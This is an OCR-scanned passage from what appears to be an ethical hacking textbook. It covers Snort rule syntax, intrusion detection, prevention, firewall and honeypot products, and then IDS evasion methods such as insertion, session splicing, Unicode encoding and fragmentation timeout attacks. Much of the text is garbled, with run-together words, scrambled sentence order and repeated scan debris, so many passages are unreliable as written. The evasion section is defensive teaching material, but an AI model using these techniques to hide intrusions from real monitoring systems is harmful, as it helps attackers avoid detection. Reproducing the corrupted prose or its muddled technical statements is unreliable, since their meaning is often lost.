recording/analyzing
both sidesof a conversation,suchas telnet or POP3 sessions.
Further, note that there is no “$<$-"operator. In Snortversions before version 1.8.7,
did
the directionoperator not provide
invalidtokens,Notethat “$<$-"
propererror checking; hence,
doesnot exist so that rulesalways
manypeople used
readconsistently.
Thenext fieldsi n a Snortrule specifythe source anddestinationIPaddresses and ports
of the packet,as wellas the directioni n whichthe packet is traveling,Snortcan accepta
single IPaddressor a list of addresses. Whenspecifying a list of IP address,
you should
eachone with a
separate comma andthen enclosethe list within squarebrackets
as
follows
[192.168.1.1,192.168.1.45,10.1.1.24]
Whendoing
this,becarefulnot to use anywhitespaces.
You can alsospecify
the ranges
of IPaddresses usingCIDRnotation or even includeCIDRrangeswithinlists.Snortalso
allowsyou to apply the logical
NOToperator("I") to a n IP addressor CIDRrangeto
specifythat the rule shouldmatchall but that address or rangeof addresses. For
example, to the initial example
an easy modification is to change
it
suchthat an alert is

ical andCountermensores
Mackin ©by E-Comel
Copyright
 any trafficthat hasoriginated
raisedupon detecting outsidethe localnet usingthe
negationoperator.
Exampleof a Port Negation:
log tep any any -> 192.168.1.0/24 16000: 6010

Protocols Address
WP Action
LogUDPtraffic comingfrom anyportand
LOE
|
UDPanyany->
1:1024
||| ports
192.168-1.0/24

192.168.1.0/24
:5000
from
1to
4. timation ranging 1024

LogTCPtrafficfromany portgoingto ports

any
LagTOPary ->

or to
lessthan equal5000

TCP
TCPanyany102:1024
Lee
Log >
400:
| TCP
192.168.1.0/24
traffic
ports ports
to
Log
Boingand from the well-known
greaterthanor equal
to400
Table ofa PortNegation
12.2:Examples
Suricata
Source:https://suricata-ids.org
Suricatais a robustnetworkthreatdetectionenginecapable of real-timeintrusion
detection(IDS),inline intrusion prevention (IPS),
network security monitoring (NSM),
andofflinepcapprocessing. It inspects the networktrafficusingpowerfulandextensive
rulesand a signature language, and it providespowerful supportfor the
Lua scripting
detectionof complex threats.With standardinputand outputformatssuchas YAML
andJSON, integrationswith existing toolssuchas SIEMs, Splunk,Logstash/Elasticsearch,
Kibana,andotherdatabases becomeeffortless.

Figure
12.21: of TippngPoin
Screenshot

ical andCountermensores
Mackin ©by E-Comel
Copyright
 =
Alienvault®
ossimâ„¢
Source:https://www.alienvault.com
OSSIMâ„¢,
AlienVault® Open SourceSecurity
InformationandEventManagement (SIEM),
provides open-sourceSIEMcomplete
you with a feature-rich with event collection,
normalization,
andcorrelation
OSSIMprovides platform
a unified with manyessential capabilities
security suchas:
>
Asset discovery Behavioralmonitoring
©

©
Vulnerabilityassessmentand
intrusion detection
© SIEMevent correlation

Someadditional
intrusion detectiontoolsare listedbelow:
=
Security
SolarWinds (https://www.solarwinds.com)
EventManager
+
(https://vww.ossec.net)
OSSEC
+
IDS(https://www.zeek.org)
BrolDS/Zeek

ical andCountermensores
Mackin ©by E-Comel
Copyright
 IntrusionDetectionToolsfor Mobile Devices
=s Taspector
‘Wil

YourNet

Intrusion DetectionTools for Mobile Devices

Intrusiondetectiontools are alsoavailablefor mobiledevicesto helpyou detectand prevent
intrusion attempts.
=
aps
Source:https://www.zimperium.com
Zimperium’s
zIPSâ„¢
is a mobile intrusion preventionsystemapp that provides
comprehensive foriOSandAndroid
protection devices
againstmobilenetwork,device,
and application cyber-attacks.
It can detect both known and unknownthreats by
analyzingthebehavior of your mobiledevice.Byexaminingslightdeviations
fromthe
mobiledevice'sOSstatistics, memory,CPU,and other systemparameters, the 29%
detectionenginecan accurately identify
not only the specific
typeof maliciousattack
but alsothe forensicsassociatedwith the who,what,where,when, and how of an
attackoccurrence,

Module2 1514
Page ical
and ©
Mackin Countermensores
Copyright
by E-Comel
 Figure
12.2%
Screenshot
of2°S
Wifi Inspector
Source:https://play.
google.com
Wifi Inspectorallowsyou to findall the devicesconnected to the network(via both
wiredandWi-Ficonnections, including consoles,
TVs, PCs, tablets,and phones);
it gives
relevantdatasuchas the IP addresses, manufacturer names, devicenames, andMAC
addressesof connecteddevices.It alsoallowsyou to save a listof knowndeviceswith a
name andfindsintrudersi n a shortperiod,
‘custom

YourNet

12:24;Screenshot
Figure ofWifilaspector

ical
Mackin
and Copyright
©
by Countermensores E-Comel
WifiintruderDetect
Source:https://wifi-intruder-detect.en.aptoide.com
Wifi Intruder Detect helpsto find security leaks i n the Wi-Fi network Internet
connection. It allowsyou to detectan intruder
whois accessing
the network,Wi-Fi, or

Internet
without
your
consent,
connection

12.25:Screenshoto f Wil IntruderDetectorPro

Figure

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Intrusion PreventionTools

United
‘AilenVaultD Security
"aM
Management®
(SDM) SecrtyNetworknso
tem
rventon

© ante
epee
ier
net
Theat
change revention
we emu Ope
_
(PR
cpberoam
nrusion Sytem

Intrusion PreventionTools
=
UnifiedSecurity
AlienVault® Management®
(USM)
Source:https://www.alienvault.com
AlienVaultUSM can perform threat detection,
incidentresponse,and compliance
management across cloud, and hybrid
on-premises, environments. It can be integrated
with AlienVault Open Threat Exchange (OTX), which is an open threat intelligence
with more than 100,000
‘community participantswhocontributeover 19millionthreat
indicatorsdaily
to protectthe networkfromintrusions.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 22.26Screenshot
Figure of AlenvauitUSM
Someadditionalintrusion prevention
toolsare listedbelow:
‘+
IBM Security (https://www.ibm.com)
NetworkIntrusion Prevention System
=
Cyberoam IntrusionPreventionSystem(https://www.cyberoam.com)
+
(https://www.mcafee.com)
McAfeeHost IntrusionPreventionfor Desktops
(https://www.cisco.com)
CiscoIntrusion PreventionSystems
CcheckPoint IPSSoftwareBlade(https://www.checkpoint.com)

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Firewalls:ZoneAlarmFreeFirewall 2019and
ManageEngine Firewall Analyzer

Free
‘oneBlarm Firewall2019
‘ManegeEngin
Firewall
Analyzer

——
ed
Firewalls

Firewalls
Cork Pisanee ore
rutiimmtacon_© Wie
Firewalls provideessential protectionto computersagainstviruses, privacy threats,
objectionable content,hackers, andmalicious softwarewhenconnected to the Internet. A
firewallmonitors runningapplicationsthat accessthe network.It analyzes
downloads,raisesan
alertwhendownloading file,andstopsit frominfecting
a malicious a PC.

ZoneAlarm FreeFirewall2019
Source:https://www.zonealarm.com
ZoneAlarmFreeFirewall2019 prevents attackersand intrudersfrom accessingyour
system.It managesandmonitors all incomingand outgoingtrafficandshieldsthe
network from hackers, malware,and other online threats that may compromise
network privacy.It monitors programsfor suspicious behavior, spottingand stopping
new attacksthat bypass traditionalanti-virus protection.Moreover, it preventsidentity
theft byguarding
complete
your
data. your
privacy.Furthermore,
PCinvisibleonline.In addition,
tracks,
It alsoerases
it locksout attackers,
allowingyou to surfthe web i n
blocksintrusions,andmakesyour
it filtersout annoyingandpotentiallydangerous emails.
Features:
©

©
Two-way
firewall
monitorswell
outbound
traffic
that andblocks
Allowsusersto browsetheweb privately
inboundas as

usingthe FullStealthMode
© Identityprotection services help
to preventidentify
theft byguarding
crucialdataof
the users. It alsooffersPCprotectionanddataencryption
Publicnetworkprotection are other key
andwirelessnetworkprotection featuresof
thisfirewall

ical andCountermensores
Mackin ©by E-Comel
Copyright
©
quick
Provides
security
updates
real-time

ANTIVIRUS FIREWALL Moouity

12.27:
Screenshot
Firewall
‘ManageEngine
Figure
Analyzer
ZoneAlarm
PRO 2017
of FIREWALL

https://www.manageengine.com
Source:
ManageEngine Firewall Analyzer is an agent-less
loganalytics and configuration
management softwarethat helps network administratorsto understandhow the
bandwidthis beingusedin their network.ManageEngine FirewallAnalyzer
is vendor-

Check
andsupports
agnostic
Point,Cisco, all
nearly open-source andcommercialnetworkfirewallssuchas
Fortinet,
Juniper, andPaloAlto.
Features:
©.

©
and
ComplianceChange
UserInternet Activity
Management
Monitoring
© NetworkTrafficandBandwidthMonitoring
FirewallPolicy
Management
Real-timeVPNandProxy ServerMonitoring
NetworkSecurity Management
NetworkForensicAudits
Log
Analysis ical andCountermensores ©by E-Comel
Mackin Copyright
 FirewallTrafficStatistics

DeviceName Received

>
CiscoPIX 28078

>
Paloaito ome

gue 12.28 Screenshot

of Managetngine Analyzer
Firewall

Someadditionalfirewallsolutionsare listedbelow:
=
pfSense (https://www.
pfsense.org)
=
Sophos (https://www.sophos.com)
XGFirewall
Comodo Firewall(https://personalfirewall.comodo.com)
PaloAlto NetworkWildfire(https://www-paloaitonetworks.com)

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Firewallsfor Mobile Devices

|
Firewalls forMobile Devices
previously
Thefirewallsdiscussed are usedfor securing personal and networks.
computers
Similarly,
=
some
firewalls can secure mobile
Mobiwol:NoRootFirewall
devices.

Source:http://www.mobiwol.com
MobiwolNoRootFirewallhelps allow/block
to take controlof mobileapps, easily app
andblockbackground
connectivity, alertswhen new apps
app activity.It generates
access the Internet.
Features:
Automaticlaunches
on device
startup
Automaticallyidentifies
applications
currentlyinstalledon your mobiledevice
Identifiesandnotifieswhennewly
installedappsaccesstheweb
Setsallow/blockon a per-application
basis
background
Disables activityfor selectedapps

Module2 1519
Page ical andCountermensores
Mackin
©
Copyright
by E-Comel
 12.28:ScreenshotofMebiwol:
Figure NoRootFrewal

Mobile Privacy
Shield
Source:https://shieldapps.com
Mobile PrivacyShieldis an application for peopleon the move, i.e., peoplewho store
necessary information on their smartphones and use their devicesfor banking,
shopping, business,and more. Mobile Privacy Shield’s
Privacy Advisor monitors
applicationpermissions,sorting them into three categories bythe privacy-risk level
Eachreporti s packed with detailedinformation anda responseis suggested per case.
Mobile PrivacyShieldcentralizesall permissions,allowing
you to review andassess their
validity
andneedconveniently. It alsoallowsyou to remove eachthreatfromwithinthe
interface.

12.20Screenshot
Figure ofMobilePrivacy
Shiela

Modul2 1520
Page ical andCountermensores
Mackin
©
Copyright
by E-Comel
NetPatch
Firewall
Source:https://firewall.netpatch.co
NetPatchFirewallis a full featuredadvancedAndroidno-root firewall,It can beusedto
fullycontrola mobiledevicenetwork.Using
NetPatch
Firewall,
you can create network
rulesbasedon apps, IP addresses,
domainnames, etc. Thisfirewall is designed
to
reducea mobiledevice'snetworktrafficandbattery
consumption, improvenetwork
andensure privacy.
security,
Features:
> Blocknetworkaccess perapp,screen on/off, (3G
Wi-Fi/mobile & 4G),
blockroaming.
© Shadowsocks
CustomDNS,
secure

change
proxy,
support
(a TCPandUDP betterVPNproxy)
your DNSserver, supportONSquery throughShadowsocks
proxy,andset the DNScachetime
Notify
whennew appsinstalled
Export/import
configure
Cer
System
Apps

m
|
a
LJ
&
a IN IN

| 12.3: Sereenshotof
Figure NetPateh
Firewall

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Tools:KFSensorand SPECTER
Honeypot

Tools
Honeypot
Honeypots
are securitytoolsthat allowthe security to monitor attackers’
community tricksand
exploits
bylogging to suchexploits
all theiractivityso that it can respond quicklybeforethe
attackerc an misuse or the system.
compromise
+
KFSensor
Source:http://wwrkeyfocus.net
KFSensor is a host-based to attract anddetecthackers
IDSthat acts as a honeypot and
worms bysimulating vulnerablesystemservices and Trojans. Byactingas a decoy
server, it can divert attacks from criticalsystemsand provide a higher level of
information
than
that and
NIDS
alone.
achievedusing firewalls
You can use KFSensori n a Windows-based environment. It includesmany
corporate
innovative and unique featuressuchas remote management, a Snort-compatible
signature engine, andemulations
ofWindows
networking
protocols.

ical andCountermensores
Mackin ©by E-Comel
Copyright
@vrsersorProtenionl-vtaton Ta

2822 wt Yes
CR me
RN sata
OTS,
crea
al
ree)
| ORR
— a iep Te See]

BT
3.9
Discard
ithe “Recent
Rec
2 11 7Daytime
<
3 Quoteotthe
chargen
319FTP Recent.
“Re
G212288iRecon
B
Be
tones
tc

erihe:Ai n 7 Severtack Vite Bre A227

SPECTER
Figure 12.32:
of
ScreenshotKFSensor

Source:http://w specter.com
SPECTER
is a honeypotor deception system.It simulatesa complete
systemand
provides
an appealing
targetto lure hackersaway from production It offers
systems.
typical
Internet services suchas SMTP, HTTP,andTELNET,
FTP,POP3, which appear
perfectly normalto attackers.However, it trapsattackersbytricking theminto leaving
some tracesthat showthat they hadconnected to a decaysystem that doesnone of the
thingsit appearsto but insteadlogs
everything andnotifiesthe appropriatepeople.
Furthermore, SPECTER automaticallyinvestigatesattackerswhile theyare still tryingto
breakin. It providesmassiveamounts of decoy decoy
content andgenerates programs
Automatedweekly
that do not leavetraces on the attacker'scomputer. onlineupdates
of the honeypot's content and vulnerabilitydatabasesallow the honeypotto change
regularlywithout user interaction.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 I
Pre a |
Ee |
Frama
Feat i Meise

Foal Soe oe ne
i
Piened
zones
|ioed
F
ed
oF)
cette
al|F
Fok
Peer Poo tant
F tna 2] ee ——
aren | Masai =

eee

honeypot
Someadditional toolsare listedbelow:
Figuee
12.55:
of Screenshot SPECTER

‘=
(https://www.atomicsoftwaresolutions.com)
HoneyBOT
=
(https://github.com)
MongoDB-HoneyProxy
+
Network(https://aithub.com)
ModernHoney
Honeyd
(http://www-honeyd.org)

Module
Page 2 1526 ti l
Macking
and ©by Countermeasures E-Comell
Copyight
 ModuleFlow

IDS
Evading
The previoussections helped u s to understand IDS,IPS,theirrolesand functions,how they
protectyour networkfrom intruders, andthe various IDSsolutionsavailable.Eventhough IDS
thwart attemptsto breachthe networksecurity, attackers
c an still evadeIDS.Thissection
explains
various ways in whichattackers evadeIDS.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 IDSEvasionTechniques

Ed vsicodetation PolymericShallcode

EEd
cementation stack ASCH
Sheicode

Deniakot
Service
tack Overlapping
Fragments
Aoplcation
Layer Attacks

obfucatng Time-To-ve
Atacks Desypehronisation

False
Postive
Generation BEY tansrrociess Encryption

Session
Splicing fi: ot ooding

IDSEvasionTechniques
IDSthat provide an extra layer to the organization's
of security infrastructureare interesting
targetsfor attackers.Attackersimplement various IDSevasion techniques to bypass such
securitymechanisms and compromisethe infrastructure.IDS evasion is the processof
modifyingattacksto foolthe IDS/IPS that the traffic is legitimate
into interpreting and thus
preventthe IDSfromtriggeringan alert. Many IDSevasion techniques can performIDSevasion
differentandeffectiveways.
in

SomeIDSevasion techniquesare as follows

+

+
Insertion
Attack
Evasion
Time-To-Live
Attacks
InvalidRSTPackets
+
DosAttack Flag
Urgency
Obfuscating Polymorphic
Shellcode
FalsePositiveGeneration ASCIIShelleode
Splicing
Session Application-Layer
Attacks
UnicodeEvasion Desynchronization
Fragmentation
Overlapping
Attack
Fragments
Encryption
Flooding

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Insertion Attack

“Th
stint ds i a eno ad tala ep nod

TDester
srs cob ch He oman He nr pe

a¥<¥5)
Tora)
(af

©
pyarete ae
OOO
©
fg Juonhatwaterenhoweee

InsertionAttack
Insertionis the processbywhichthe attacker confuses the IDSbyforcing it to read invalid
packets (ie, the systemmay not accept the packet addressed to it).An IDSblindly trusts and
accepts a packet that an end system rejects.fa packet is malformed or if it doesnot reach its
actualdestination, the packet is invalid,If the IDS readsa n invalid packet, it gets confused.An
attacker
is
less
exploits
andthe IDSconcludes
thiscondition
strict i n processingpackets
and
inserts
datainto the IDS.Thisattackoccurs whenthe NIDS
thanthe internalnetwork.Theattackerobscures
that the trafficis harmless. Hence, the IDSgetsmore packets
extra traffic
than the
destination.
To understandhow insertion becomesa problem for a network IDS,i t is important to
understandhow the IDSdetectsattacks.It employs pattern-matchingalgorithms to look for
specific
patternsof datai n a packet or stream of packets.Forexample, it might searchfor the
“ph―
stringin an HTTPrequest
attackerwho can insert packets
instance,an attacker
a
to discover PHFCommon
Gateway
Interface
into the IDScan preventpatternmatching
can sendthe string“phf―
to a webserver, attempting
(CGI)attack.An
from working.
to exploit
For
theCGI
vulnerability,
but forcethe IDSto read“phoneyf―(by“inserting―
the string“oney―)
instead.A
straightforward intentionally
insertion attackinvolves the IP checksum.
corrupting packet
Every
transmittedo n
an IPnetworkhasa checksum that verifiesthe corrupted packets. IPchecksums
are 16-bitnumbers computed
by examiningtheinformation i n the packet. If thechecksum on
an IP packet
doesnot matchthe actualpacket, the addressed hostwill not accept it, whilethe
IDS mightconsiderit as partof
Forexample, theattacker
the
effectivestream.
can sendpacketswhosetime-to-live (TTL)
fieldsare craftedto reach
the IDSbut not the targetcomputers.Thiswill resulti n the IDSandthe targetsystem having
differentcharacter
‘two An attackerconfronts
strings. the IDSwith a stream of one-character

Module2 1527
Page ical andCountermensores
Mackin Copyright
©
by E-Comel
packets (theattacker-originated
datastream), (theletter“X")
in whichone of the characters
will be acceptedonlybythe IDS,As a result,
the IDSand the end systemreconstruct two
different
strings.

of folol
<1) (ol dolor
io
Accepted
Monitor

iG)
Insertion of the letter ‘X’

105
using
12:34:Evading
Figure attack
insertion

Module2 1528
Page ical andCountermensores
Mackin
©
Copyright
by E-Comel
 Evasion

1Inthis
technique,
system
packet
that
evasion an end accepts
a an IDSrejects

(@Using
18Theattacker
the
thisteennique

sends
explots
an attacker thehostcomputer

oftherequest
portions
without

thatthe105mistakenly
i n packets allowing
rejects, the
removal
IDSever realizing
it

of partsofthestream frm the10S

byteby-byte
andone bytes

05,
'ssent
bythe
‘ejected the10S
c annot

pase Insertion ofthe the destination

‘An attackoccurs whenthe IDSdiscardspackets

“evasion― while the hostthat hasto get the
packets accepts them.Using thistechnique, an attackerexploits the hostcomputer. Evasion
attackshave an adverseeffecton the accuracyof the IDS.An evasion attackat the IP layer
allowsan attacker arbitrary
to attempt attacks againsthostson a networkwithoutthe IDSever
realizingit, The attackersendsportionsof the requesti n packets that the IDSmistakenly
rejects,allowing the removalof partsof the stream fromthe ID system's view. For example,if
the attackersendsa malicioussequencebytebybyte,and if the IDSrejectsonlyone byte,it
cannot detectthe attack.Here,the IDSgets fewerpackets thanthe destination
(Oneexample of an evasion attackis whenan attackeropensa TCPconnection with a data
packet.Beforeany TCPconnection can be used,it must be “opened― with a handshake
betweenthe two endpoints of the connection. An essential
fact about TCP is that the
handshakepackets can themselves beardata.TheIDSthat doesnot accept the data in these
packets
is vulnerableto an evasion attack.

lalal «
= Monitor ccepted

i
te -|
Healicay
Seam Insertionofthe
tetera"

Figure
12.35;
lustrationof technique
Evasion

Module2 1529
Page ical andCountermensores
Mackin Copyright
©
by E-Comel
 Denial-of-ServiceAttack (DoS)
{©Many 05suse a centralized
server for logging
alerts
|G tthe attackers
knowtheIPaddress
ofthe centralized
server, theycan perform
D oSor otherh acks
toslowdown or crash
theserve
“Asrest, the attackers’
intrusion willnot belogged
attempts

© cnrene seer

ing this
technique,
anattacker ‘autesmoe
than
handled
by syste
alas can be management ch a taba

Denial-of-ServiceAttack (DoS)
Multiple
typesof DoSattackwill work againstIDS.Theattackeridentifiesa pointof network
thatrequirestheallocation
processing of a resource, causinga condition
to occur i n whichallof
Theresourcesaffectedbythe attackera re CPUcycles,
that resource is consumed. memory,disk
space,andnetworkbandwidth.Attackers monitor andattackthe CPUcapabilities
of the IDS.
Thisis becausethe IDSneedshalf of a CPUcycle to readthe packets,
detectthe purposeof
their existence,andthen compare themwith some locationi n the savednetworkstate. An
attackercan verifythe most computationally expensivenetwork processingoperations and
compel
‘then the IDSto spendall its time i n carryingout useless
work,
IDSrequiresmemoryfor a varietyof taskssuchas generating
‘An a matchforthe patterns,
saving the TCPconnections, reassembly
maintaining queues, and producing buffersfor the
data. In the initial phase,
the systemrequires memoryto read the packets.
The system will
allocatethe memoryfor networkprocessing An attackercan verifythe processing
operations.
operations
formeaningless information. to
that requirethe IDS allocatememoryandforcethe IDSto assignall of its memory

the IDSstore activitylogs

In certain circumstances, o n the disk.Thestoredevents occupy most
of the diskspace.Most computers havelimiteddiskspace.Theattackerscan occupya
significant
partof the diskspaceon the IDSbycreating andstoringa large numberof useless
events.This rendersthe IDSuseless realevents.
i n termsof storing

NetworkIDSrecord the activityon the networks theymonitor. Theya re competent because

networksare rarelyusedto their full capacity; few monitoringsystems c an cope with an
extremely busy network

ical andCountermensores
Mackin ©by E-Comel
Copyright
 IDS,
‘The unlikean end system,must readeveryone’s
packets,not just thoseexplicitly
sent to it.
An attackercan overloadthe networkwith meaningless
informationand preventthe IDSfrom
keeping
up withwhatis happening
on thenetwork.

Many IDStoday employ centrallogging servers that are usedexclusively to store IDSalert logs.
‘The
centralserver'sfunction is to centralizealert data so that it is viewedas a wholerather
thanon a system-by-system basis.
However,
if attackersknowthe centrallogserver'sIPaddress,
theycouldslowit downor even
crash Aftershutting
it usinga DoSattack. downtheserver, attackscouldgounnoticed
because
thealertdatais now no longer
logged
Using
thisevasiontechnique,
an attacker
Causes

to the device lockup

=

=
Causes
personnel
to
investigate
all to beunable
(such
thealarms
m ore alarmsthan can be handledbymanagement
Causes systems as databases,
etc.)
Fillsup diskspace,preventing
attacksfrombeing logged
Consumes the device's
processing
power andallowsattacks
to sneakby

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Obfuscating
‘buscatng usedbyattackers
sa 105evasion technique whoencode
theattack
packet
payload
in such
a
pthin
@ ‘eaters thefol
aioe e reerenced sinatureto the MOS

] trrvters
encode
stack
pattern
con

unicode
05 to bypass fier, but b eunderstood
we
byan IS server

code
Polymorphic i another
means IDSsbycreatingerent
to creumventsgatur-base
attack patterns,

Obfuscating
Obfuscation or read,
means to makecodemore difficult to understand generallyfor privacy or
security purposes. converts a straightforward
A tool calledan obfuscator programinto one that
worksi n the sameway but whichis much
CObfuscating
is an IDSevasion technique
more
difficult
to understand.
usedbyattackersto encodethe attackpacketpayload
in sucha
manipulatesway
thatthedestination
hostcan only
decode
the packet
the pathreferencedi n the signature
attackercan encodeattackpackets
but not theIDS.An attacker
to fool the HIDS.Using
Unicodecharacters,
thatthe IDSwouldnot recognizebut whichan 1ISweb
an

server can decode.Polymorphic codeis anothermeans to circumvent signature-based IDSby

creating uniqueattackpatterns
s o thatthe attack doesnot havea single detectablesignature.
Attackersperform obfuscatedattackson encrypted protocols suchas HTTPS.
Attackerscan also
use obfuscationtechniques
suchas digital
steganography
to bypass
IDSanddeploy
malwareon
lyingbeyond
to the targetsystem the IDS.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 FalsePositiveGeneration

-tackerswith inowledge
ofthetarget1Seratmalicious
packets
jst to alerts
generate

‘These manyfale postivealerts

are sent tothe IDSto generate
packets

of
the10Suntied
‘tacks cn bypass a ts ifiut to ferentite theattackraf fram
the age volume fae postive

FalsePositiveGeneration
Thismodedoesnot attackthe target;instead, it doessomething relatively
ordinary. In this
mode, theIDSgenerates an alarmwhenno condition i s presentto warrantone. Another attack
similarto the DoSmethodis to create a significant
Attackers construct maliciouspackets known to trigger of
amount alert datathat the IDSwill log,
alertswithin the IDS,forcing it to
generate a large
i n a n attempt
looking
of
number falsereports. Suchan attackcreatesa large amount of log“noise―
to blend real attackswith fake ones. Attackersknowall too well that when
at logdata, it can be challenging to differentiatebetweenlegitimate attacksandfalse
positives. if attackersknowthe IDS, theycan even generate specific
falsepositives to that IDS.
‘Attackers
then use thesefalsepositive alertsto hiderealattacktraffic.Attackerscan bypass IDS.
unnoticed, as it is difficult to differentiatethe attacktraffic from the large volumeof false
positives.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 SessionSplicing
splicing
‘Session i a technique used
suchthat no
packets
‘many
the DSwhere
to bypass
he ragesthe10S an
attachersplits
theattackrafiinto

BED testes
2c aor ofa ety in packet
esse
atte
5, ty an a eas betweeeke

‘Many
IDSs hey donat cecelve packetswithin
stopreassembly a cetan time

reassembly
time

SessionSplicing
Sessionsplicing is an IDSevasion technique that exploitshow some IDSdo not reconstruct
sessionsbefore pattern-matching thedata.Itis a network-level evasion methodusedto bypass
IDSwherean attackersplits the attacktrafficinto an excessive numberof packets suchthat no
single packet triggers theIDS.The attacker dividesthedatai n thepackets into smallportionsof
2 few bytes andevadesthe stringmatchwhile delivering the data.TheIDScannot handlean
excessive numberof small-sized packets andfails to detectthe attacksignatures.If attackers
knowwhatIDSis in use,theycouldadddelays betweenpackets to bypassreassembly checking,
Thisapproach is effectiveagainst IDS that do not reconstruct packets before checking them
against intrusion signatures.If attackersare aware of the delay i n packet
reassembly at the IDS,
theycan adddelays betweenpacket transmissionsto bypass the reassembly.
ManyIDSreassemble communication streams;hence,if a packet is not receivedwithin a
reasonableperiod,
manyIDSstopreassembling and handlingthat stream. If the application
under attack keeps a session active for a longer time than that spent bythe IDS on
reassembling it, the IDSwill stop.As a result,any sessionafterthe IDSstopsreassemblingthe
sessions will be susceptible to maliciousdatatheft byattackers.TheIDSwill not loganyattack
attemptaftera successful splicingattack.Attackerscan use toolssuchas Nessusforsession-
splicing attacks.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 UnicodeEvasionTechnique

IntheUnicode space,l the code

code pointsare reste aitferenty t ha therecould
but tis posible be
multiple
representations character
ofasingle

For
example, / %u2215,
%u00e9[UTF-16)
€ + > %e2KH9%90
and©> Kc2¥a9, UTF-

ofthesme characters,
terpetations

thisas an advantage,
Taking attackers
can
to
convertattackstrings Unicode
characters
o avd a nd
pattern

UnicodeEvasionTechnique
Unicodeis a charactercoding systemthat supportsencoding, processing,and displaying
of
written texts for universal
languagesto maintain consistency
i n a computer representation.
Severalstandards, suchas Java,
LDAP,andXML, requireUnicode, andmanyOSandapplications
supportit. Attackerscan implementan attackbydifferentcharacter encodingsknownas “code
points― Themost commonly
i n the Unicodecodespace. usedcharacterencodings
are Unicode
Transformation
For Example:
(UTF)-8
Format and UTF-16.
the character“/"
In UTF-16, as “%u2215"
can be represented and “e―
as
*9u0029";
i n UTF-8,

Problems
with Unicode:
"©"
can be represented
as “%éc2%a9"
and“#―
as “%4e2%89%a0.―

In the Unicode codespace,all the codepointsare treateddifferently, but it is possible

that
there are multiple
representations of a single
character.Thereare alsocodepointsthat alter
the previouscodepoints.Moreover, applications
or OSmay assign the same representation to
differentcode points.Becauseof this complexity, some IDSmishandleUnicode, as Unicode
allowsmultiple
For example,
interpretations
“\―
represents
of
the same characters.
5C,C19C, andE0819C, which makeswritingpattern-matching
very difficult.Taking
signatures advantage of this fact,attackerscan convert attackstringsinto
Unicodecharacters to avoidpattern and signature matching i n the IDS.Attackersc an also
encodeURLsi n HTTPrequests usingUnicodecharacters to bypass HTTP-basedattackdetection
at
the IDS.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Fragmentation
Attack

canbeused
Fragmentation san atack

betwenthe 19Sandthehost

reassembly
Ifthefrazment

wil timeout
attackers andthe second
1Srec aftersending
fragment
theist agment
i
1096

In thiscena,
the10S wldropthe
athe second
fragments fra “ene

the fragments
estem wl reassemble
target

“ae
delays
sytem
with 25se unt al l theattack
athe target
pyloadreaeembled

Fragmentation
Attack (Cont'd)

‘A
simlarfragmentation
‘works
when
attack
theDStimeout

Fragmentation
Attack
IP packetsmust followthe standardMaximumTransmission Unit (MTU) size whiletraveling
across the network.If the packetsize is exceeded,it will be splitinto multiple fragments
(‘fragmentation’).
TheIPheadercontains of a fragment ID,fragment offset,fragment length,
fragments and othersbesidesthe original
flags, data. In a network, the flow of packetsis
irregular;
hence,systems needto keep fragments around, wait forfuturefragments, andthen
reassemble themin order.Fragmentation can beusedas an attackvector whenfragmentation

ical andCountermensores
Mackin ©by E-Comel
Copyright
timeouts vary betweenthe IDSand the host.Through the processof fragmentingand
reassembling,
attackerscan sendmaliciouspackets over the network to exploit
and attack
To avoiddetectionby an IDS,attackers
systems. may exploitfragmentationby usingthe
fragment
reassemblytimeout, whichvaries fromsystem to system.
Attack
-1
Scenario
If,forexample,
system,
thefragment reassembly
thisscenario,the IDSwill drop
the fragment
10 s
timeout is s at theIDSand20 at thetarget
attackerswill sendthe secondfragment 15 s after sending
the first fragment.
on receivingthesecondfragment
In
afterits
reassembly timeout,but the targethostwill reassemble the fragments.
Attackerswill
continue sending fragments with intervals of 15 s until the attack payload is
reassembled at the targetsystem.Thus,the victim will reassemblethe fragments and
receive the attackcode, whereasthe IDS will not detectthis or generatealertsas the
IDSdrops the fragments.

sec
=
Frag_timeout
20 sec

=|
Time 15sec Waiting

12.36:
Figure attack
Fragmentation scenarios
Thefigure aboveillustratesthe discussed s cenario (Attack
Scenario-1).Theattackerwill
successfullyperform a fragmentation attackon a host.Theattackermanipulates the
orderand time of the fragments andsendsthosefragments to the victim machine.The
attackwill succeed whenthe NIDSfragmentation reassemblytimeout is lessthan the
victim'sfragmentation reassembly timeout,

ical andCountermensores
Mackin ©by E-Comel
Copyright
AttackScenario 2
-

A similarfragmentation
Sometimes,
attackworkswhenthe IDStimeout exceedsthat of the victim,
the IDSfragmentation
reassembly
timeout is greater
this scenario, considerthat the attackerhas fragmented
thanthat of a host.In
the attack packet into four
fragments: frag-1,
frag-2, frag-3,and frag-4.
Here,the IDS fragmentation reassembly
timeout is 60s, andthe fragmentation reassemblytimeout for thehostis 30s.
Initially,
the attackersendsfrag-2
andfrag-4, whichare received
the fragments’
reassembly
andfrag-4
a
with falsepayload
referredto as frag-2'
byboththe IDSandthevictim.Theattackerwaits until
timeout occurs at the victim'ssystem. In this attack,the
vietim hasnot receivedfrag-1,
error message.
so it will drop
the fragments
The attackerthen sendsa packet (frag-1,frag-3) an
without generating ICMP
with a legitimate
payload.
frag-3,and frag-4'.
fragments,
only
Now,the victim has frag-1
Here,frag-2'
the IDSwill perform
andfrag-3,
and frag-4’
a TCPreassembly
whereasthe IDS hasfrag-,frag-2’,
havefalsepayloads.
but drop
Withthe four received
the packet,as the computed
checksum forfrag-2'andfrag-4’
will be invalid.Iftheattackernow sends frag-2andfrag-
4 againwith a valid payload,the IDSwill have onlythesetwo fragments with a valid
payload,as the previousfragments will havebeenreassembled anddropped. Thevictim
will haveall fragments (Frag-1,frag-3, frag-2, frag-4)—with
valid payloads that will
readthepacketvalid
reassemble—and
as

Thefigure scenario (Attack

aboveillustratesthe discussed Scenario-2).
Theattacker
sendsthe maliciouspayload that will falsely
